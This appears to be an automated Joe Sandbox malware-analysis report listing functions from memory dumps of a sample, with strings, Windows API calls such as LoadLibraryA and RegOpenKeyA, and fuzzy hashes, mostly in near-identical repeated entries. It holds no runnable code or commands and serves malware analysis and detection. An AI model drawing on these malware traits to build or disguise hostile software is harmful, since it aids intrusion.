Instruction Fuzzy Hash: 0412E5EB30C210BD7A4385456B54AF76BAEE6C7730330842BFC87D6612FA94EE496531

Function 04D505D5 Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 916COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: 7f94e2f102a55fbe0593f6f39f51a1cbc1d1d879fb16e394912ed76be34c9a22
Instruction ID: 267e380a8d8203abdc9af9c6f3cf6864d4312ed2a2620f3c56b810be37543bce
Opcode Fuzzy Hash: 7f94e2f102a55fbe0593f6f39f51a1cbc1d1d879fb16e394912ed76be34c9a22
Instruction Fuzzy Hash: AE12D4EB30C210BD7A43C5456B54AF76BAEE6C67303308427FC87D6612FA94EE496531

Function 04D50624 Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 910COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: 6baeeb88b6b70b25dc305cf940a7e406bdde5369b1e190272a54e332f61d3582
Instruction ID: 85197f44e80c7532241809991b3063e2a479f48e678d01405a7ff900f7061fdd
Opcode Fuzzy Hash: 6baeeb88b6b70b25dc305cf940a7e406bdde5369b1e190272a54e332f61d3582
Instruction Fuzzy Hash: B602E5EB30C210BD7A4385456B54AF76BAEE6C67303308427FC87D6622FA94EE496531

Function 04D505F4 Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 906COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: fca436fff285fe4f5eaa8a2f60347794da1037ac46a64689c90cb5ce3fd109b8
Instruction ID: 9df0e3ce2fe1d99241634ebe3ac093d7ccb307b56531ca7d5427f328ad4edd9a
Opcode Fuzzy Hash: fca436fff285fe4f5eaa8a2f60347794da1037ac46a64689c90cb5ce3fd109b8
Instruction Fuzzy Hash: C902D5EB30C210BD7A4385456B54AF76BAEE6C77303308427FC87D6612FA94EE496531

Function 04D50699 Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 903COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: eebc2bd83003308dca71e8cf82c2fafe278572410d8f665de4a7f3f025332871
Instruction ID: a51dedbd5ce665624fcfb672323cc41f01aad9da99043993100bd0ace2115833
Opcode Fuzzy Hash: eebc2bd83003308dca71e8cf82c2fafe278572410d8f665de4a7f3f025332871
Instruction Fuzzy Hash: 2A02E4EB30C210BD7A4385456B54AF76BAEE6C77303308427FC87D6622FA94EE496531

Function 04D50604 Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 902COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: a1e7d29af9adf05b74e92ab69ba86fd7bbbc527dc6dffde9546beed7b8dca56c
Instruction ID: 44adff128ad73f95d4a08bcf51d4a1029adfa2ece294e1aead0f838890274641
Opcode Fuzzy Hash: a1e7d29af9adf05b74e92ab69ba86fd7bbbc527dc6dffde9546beed7b8dca56c
Instruction Fuzzy Hash: CB02D4EB30C210BD7A43C5456B54AF76BAEE6C67303308427FC87D6622FA94EE496531

Function 04D50619 Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 899COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: 82482b08f8b476e58e0f058022e51cee24a3e1d4d99bda1a3646c746fdf4be04
Instruction ID: de96a1f371830d5df0824df9477a7507fa655616632fb012fc2c0161a1e2b3eb
Opcode Fuzzy Hash: 82482b08f8b476e58e0f058022e51cee24a3e1d4d99bda1a3646c746fdf4be04
Instruction Fuzzy Hash: 9402D4EB30C210BD7A43C5456B54AF76BAEE6C67303308427FC87D6622FA94EE496531

Function 04D5065C Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 892COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: 2e6b6720de3196542c5a8fc18c2e184aeae970f6306ab3f78ea8dcbe8178884a
Instruction ID: f65b5dd59337ecfee080d902bbfb5c5ae636d6bd7265c0d7a0fe0ae5a22c542f
Opcode Fuzzy Hash: 2e6b6720de3196542c5a8fc18c2e184aeae970f6306ab3f78ea8dcbe8178884a
Instruction Fuzzy Hash: 8902D5EB30C210BD7A4385456B54AF76BAEE6C77303308427FC87D5622FA94EE496531

Function 04D50674 Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 879COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: 09721a1bc8b8d3b3adaa54e992c3a40575434e048a9fd16cc4f9039140babc6a
Instruction ID: cfa3212fea13abd1e424a2f9c02b3d064f4589f6a41ab40511fb72b22b34d87e
Opcode Fuzzy Hash: 09721a1bc8b8d3b3adaa54e992c3a40575434e048a9fd16cc4f9039140babc6a
Instruction Fuzzy Hash: F902E5EB30C210BD7A4385456B54AF76BAEE6C77303308427FC87D6A12FA94EE496531

Function 04D50685 Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 877COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: 544c0f44cdd19d8eb7681eb2d47184339d8fe3a4f463881cdafc1de67f841bd0
Instruction ID: be04977a5cf88d4d7d70a86fdc25cc9cb346262006c7187f987298cb837e3103
Opcode Fuzzy Hash: 544c0f44cdd19d8eb7681eb2d47184339d8fe3a4f463881cdafc1de67f841bd0
Instruction Fuzzy Hash: 1F02E4EB30C210BD7A4385456B54AF76BAEE6C77303308427FC87D6A12FA94EE496531

Function 04D506A8 Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 876COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: e5fc41491caea765d3e729b1c3fe9ba2c06584c05349072942faa19d7092ffb0
Instruction ID: 159ea99d9b98ac14a55d82cb390b04e15a135b0d7ccc21f2533256c7bb77b265
Opcode Fuzzy Hash: e5fc41491caea765d3e729b1c3fe9ba2c06584c05349072942faa19d7092ffb0
Instruction Fuzzy Hash: D502F4EB30C210BD7A4385456B54AF76BAEE6C77303308427FC87D6A12FA94EE496531

Function 04D506CA Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 857COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: 78e774e5aea1a3127854ede1b10082ba75ae0376b80532320228003eea231b4a
Instruction ID: b31853eb2105929080f5b74cbd8de5eec71f198cb104c19d9221e704812197c9
Opcode Fuzzy Hash: 78e774e5aea1a3127854ede1b10082ba75ae0376b80532320228003eea231b4a
Instruction Fuzzy Hash: 7802D4EB70C210BD7A43C5456B54AF76BAEE6C67303308427FC87C6612FA94EE496531

Function 04D5070F Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 848COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: 23a218222c1b033679df461e9a5d34df9719b0cf0a3c5af0376434cfaffbf240
Instruction ID: 1d3a46940c827d3e146dcb425c9e19c8c5c6695dd081144f7f1e2fb636f8d2ef
Opcode Fuzzy Hash: 23a218222c1b033679df461e9a5d34df9719b0cf0a3c5af0376434cfaffbf240
Instruction Fuzzy Hash: 9402E3EB30C211BD7A4385456B54AF76BAEE6C77303308427FC87C6622FA94EE496531

Function 04D506EB Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 847COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: f10d2ab9bd7f182e5d182aa13eea4e5de2142926ca6aa3a8925a0016ebb0c396
Instruction ID: 80472f667a8bbb7e6d3f056e59c531a1191d2d602592894ac79b5c9445d0024b
Opcode Fuzzy Hash: f10d2ab9bd7f182e5d182aa13eea4e5de2142926ca6aa3a8925a0016ebb0c396
Instruction Fuzzy Hash: C802D3EB30C211BD7A4385456B54AF76BAEE6C77303308427FC87C6622FA94EE496531

Function 04D50754 Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 837COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: d867aa05195411d83dc99e4b9564ad74c6c16347cd52335caa0b9993f4ca9948
Instruction ID: 74ea62faf59799904c9787b3d12d08ddbef6b0e167f8b48e9eea453d96411c26
Opcode Fuzzy Hash: d867aa05195411d83dc99e4b9564ad74c6c16347cd52335caa0b9993f4ca9948
Instruction Fuzzy Hash: 98F1F5EB34C210BD7A4385456B54EF76BAEE6C7730330842BFC87C6612FA94AE492131

Function 04D50733 Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 835COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: b7f2a3fd44a6dee23a318f403462b327eb83d26fed218473d9a3675709245c2f
Instruction ID: 0af8404848223b5fc075c6d567024811c1ddcc3b607a4f045a21c83e6cbe65f1
Opcode Fuzzy Hash: b7f2a3fd44a6dee23a318f403462b327eb83d26fed218473d9a3675709245c2f
Instruction Fuzzy Hash: 8AF1E3EB70C210BD7A4385456B54EF76BAEE6C67303308427FC87C6A12FA94EE496531

Function 04D507DE Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 833COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: f7b6b99f1b062f012cf34c9bb1c835ae8df50cc0c0725b12c331e2b76de99e41
Instruction ID: 11447d3007c0c08ed0631388a006b7ef74c7423295e6e8c063ee3382360a199d
Opcode Fuzzy Hash: f7b6b99f1b062f012cf34c9bb1c835ae8df50cc0c0725b12c331e2b76de99e41
Instruction Fuzzy Hash: CA02E4EB30C210BD7A43C5456B54AFB6BAEE6C67303308427FC87C6612FA94EE496531

Function 04D50742 Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 831COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: ee908e6292a76f05180e05d839da17fe590661d6c719406a6f6ee37b3d9e30de
Instruction ID: c4a86993e2fa5507f3344c48e068875a5d01914e0def93a7043be8899ed1b4b5
Opcode Fuzzy Hash: ee908e6292a76f05180e05d839da17fe590661d6c719406a6f6ee37b3d9e30de
Instruction Fuzzy Hash: 8FF1E3EB70C210BD7A4385456B54EFB6BAEE6C67303308427FC87C6612FA94EE496531

Function 04D5078D Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 826COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: f8cff3c5dbff476a91d035b8448f09f2177b02179ca0e9c106c3e1f427ea43ba
Instruction ID: 3c28a713fa8e07346e13700cae2c7f654bb2e38ddc4ff5fe7542b6df8556000e
Opcode Fuzzy Hash: f8cff3c5dbff476a91d035b8448f09f2177b02179ca0e9c106c3e1f427ea43ba
Instruction Fuzzy Hash: 3DF1E4EB70C210BD7A4385456B54EF76BADE6C67303308427FC87C6612FA94EE496531

Function 04D50779 Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 824COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: 44047839836018fd2865fe26a63e495505e99e921355322ef5b3c1fd40cc479b
Instruction ID: 272734213dcdc57738dedc074e92fe5fc8abccbdb8ef191851bd68fa8dd93841
Opcode Fuzzy Hash: 44047839836018fd2865fe26a63e495505e99e921355322ef5b3c1fd40cc479b
Instruction Fuzzy Hash: 46F1E4EB70C210BD7A43C5456B54AFB6BAEE6C67303308427FC87C6612FA94EE496531

Function 04D50808 Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 817COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: 9933b30e8abb675fa83b7b8feef5bdeacc045ccf9bcc6d8c4053bedbff42f6f3
Instruction ID: acba96647368772adddd9b58f7c2513097152772777fb71fd357615fc60b79ed
Opcode Fuzzy Hash: 9933b30e8abb675fa83b7b8feef5bdeacc045ccf9bcc6d8c4053bedbff42f6f3
Instruction Fuzzy Hash: 98F1F5EB30C210BD7A43C5456B54AF76BAEE6C67303308427FC87C6622FA94EE496531

Function 04D507C5 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 798COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: 5c9a27c7e0107d46d20648248148e7407beb6a7b58d71243be359d6a78112bb0
Instruction ID: 5806847e9532bb5528998602516cab92f6880ae13e2ecbef61c860fce536d986
Opcode Fuzzy Hash: 5c9a27c7e0107d46d20648248148e7407beb6a7b58d71243be359d6a78112bb0
Instruction Fuzzy Hash: D1F1D1EB70C211BD7A43C5456B54AFA6BAEE6C67303308427FC87C6612FA94EE492531

Function 04D50837 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 767COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: a0e65dc15537700ef15ba87aa901ea4fe1000922458007ff8140b4d7487fb98c
Instruction ID: 9ce58fbae1a79ba51b45b902c95c60ebab69a9bfadec966ee2a3ebdff54e7500
Opcode Fuzzy Hash: a0e65dc15537700ef15ba87aa901ea4fe1000922458007ff8140b4d7487fb98c
Instruction Fuzzy Hash: 47F1E3EB70C210BD7A43C5456B54EFA6BAEE6C67303308427FC87C6612FA94EE496531

Function 04D50865 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 757COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: 6e8d23a3732f180ce2f0613fc793ccab91b3575c84c6149e0b832679ae5c941f
Instruction ID: aaa54978d6ce2a819d3899a6555a7be72fe8e4b5f589400e912b964efb321d81
Opcode Fuzzy Hash: 6e8d23a3732f180ce2f0613fc793ccab91b3575c84c6149e0b832679ae5c941f
Instruction Fuzzy Hash: 6BE1F3EB74C211BD7A43C5456B54AFB6BAEE6C67303308427FC87C6612FA94EE492131

Function 04D50883 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 754COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: e4bbc510e8b976c3163d94238738188fe7ba1226f7152e9415ee4c76bad1318c
Instruction ID: e8beb2a9360f1f806bfc3418ed03fc18d12a8320b6e2064c110c93790f73a207
Opcode Fuzzy Hash: e4bbc510e8b976c3163d94238738188fe7ba1226f7152e9415ee4c76bad1318c
Instruction Fuzzy Hash: 81E1E2EB74C211BD7A43C5456B54AFB6BAEE6C67303308427FC87C6612FA94EE492131

Function 04D5088F Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 752COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: 0b3f5c540894ef73b9b323e5c557a7e6e16aa82c7d0204b74527c5688ca8f144
Instruction ID: 96101e7c0cb128ee601c8c5effb035d778c118e3fb24cd4e1345009e2df261f7
Opcode Fuzzy Hash: 0b3f5c540894ef73b9b323e5c557a7e6e16aa82c7d0204b74527c5688ca8f144
Instruction Fuzzy Hash: 74E1E2EB74C211BD7A4385456B54AFB6BAEE6C67303308427FC87C6612FA94EE492131

Function 04D508B4 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 748COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: 19e6c3d0b923a0a152df10b8e26377b3267e1f2950960c474e09b6444c52d3b2
Instruction ID: d5c131528d2c51bae686b9207dc393476c2806777dc9a23e4017cb487368e745
Opcode Fuzzy Hash: 19e6c3d0b923a0a152df10b8e26377b3267e1f2950960c474e09b6444c52d3b2
Instruction Fuzzy Hash: DCE1E3EB34C211BD7A43C5456B54AFB67AEE6C67303308427FC87C6612FA94EE492131

Function 04D508A6 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 746COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: 42b81d8d0e90e99a31930890239b2ae5be5697dbd274b0b301acb14176ff7b3a
Instruction ID: a965325b8b10b3b62cd3ca1953f5f7540dabfa3bae09b6f2afa805be072bca87
Opcode Fuzzy Hash: 42b81d8d0e90e99a31930890239b2ae5be5697dbd274b0b301acb14176ff7b3a
Instruction Fuzzy Hash: 64E1E2EB34C211BD7A4385456B54AFB67AEE6C77303308427FC87C6612FA94EE492131

Function 00401D60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

http://, xrefs: 00401DE0

Memory Dump Source

Source File: 00000000.00000002.3069083546.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3069083546.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: http://
API String ID: 0-1121587658
Opcode ID: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
Instruction ID: beb1f9afae3dc46702148b7d116b1b3e2c798cd3d3ea86b197954d74152ad0ce
Opcode Fuzzy Hash: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
Instruction Fuzzy Hash: F451C371E002099FDB14CFA8C885BEEBBB5EF48314F20812EE915B72C1D7799945CBA4

Function 009A60F2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 009A92DD

Strings

WHL=, xrefs: 009A92F8
*L]e, xrefs: 009A60FD

Memory Dump Source

Source File: 00000000.00000002.3069516453.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a2000_WwVs3PavPg.jbxd

Similarity

API ID: LibraryLoad
String ID: *L]e$WHL=
API String ID: 1029625771-2372530960
Opcode ID: a8b81db85253c21e01701c8baa3a5dc106d4b0f3fd06f502e3dca238c905944c
Instruction ID: bcb9892595559b5d668556981ddeec5fdf56011c30caf700bd9de001ade2f6a2
Opcode Fuzzy Hash: a8b81db85253c21e01701c8baa3a5dc106d4b0f3fd06f502e3dca238c905944c
Instruction Fuzzy Hash: 13017CB1A086109FD3006F6894C567EB7E4FB99310F154D3EE9D687200D6B94995CB83

Function 009A45F7 Relevance: 4.6, APIs: 3, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 009A6517
RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 009A653E
GetNativeSystemInfo.KERNEL32(?), ref: 009A6595

Memory Dump Source

Source File: 00000000.00000002.3069516453.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a2000_WwVs3PavPg.jbxd

Similarity

API ID: Open$InfoNativeSystem
String ID:
API String ID: 1247124224-0
Opcode ID: a1c8cb09222951e0404f37f48e8488ea3c3d50af2a2b1b6ca895cc561277ef69
Instruction ID: b7fee78a206c35b5d11af4ad7bb31459f5aa35fb5da5c1ad7301acfc41b1b200
Opcode Fuzzy Hash: a1c8cb09222951e0404f37f48e8488ea3c3d50af2a2b1b6ca895cc561277ef69
Instruction Fuzzy Hash: CD3157B140424E9FEF12DF50C848BEF3BE9EF06304F500929E98186950E37A9CA4CF59

Function 009A6465 Relevance: 4.6, APIs: 3, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 009A6517
RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 009A653E
GetNativeSystemInfo.KERNEL32(?), ref: 009A6595

Memory Dump Source

Source File: 00000000.00000002.3069516453.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a2000_WwVs3PavPg.jbxd

Similarity

API ID: Open$InfoNativeSystem
String ID:
API String ID: 1247124224-0
Opcode ID: 1810f4f8be251290a155dc69c02472fa7c2882ab892becaaeb166cc873d4d8cb
Instruction ID: 2f87d32f557b66f90cc11a82b9038c301c4b46511a47d54c715c7eb5d03d3d79
Opcode Fuzzy Hash: 1810f4f8be251290a155dc69c02472fa7c2882ab892becaaeb166cc873d4d8cb
